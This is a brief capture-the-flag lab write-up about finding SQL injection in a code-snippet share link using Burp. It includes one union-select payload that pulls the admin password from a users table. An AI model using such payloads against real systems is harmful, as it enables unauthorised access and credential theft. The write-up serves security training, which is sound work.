CopyPasta

Today we have a lab with the hint SQLi

Like usual, we click around in the application and look in Burp to see what we can use. Today was a bit harder and that's because I did not click all functionality.

When you share a snippet, a share link is created. This one is vulnerable to SQLi.

When we take that same request and put it into Burp, we can start crafting our union select attack. When I hit 6 nulls, I got feedback. Usually the flag is in the password of the admin, so I crafted the payload ' union select 1,password,null,null,null,null from users—

And with the response, my flag 🇧🇪 was readable.

PreviousCheesy Does It NextRace Conditions

Last updated 3 months ago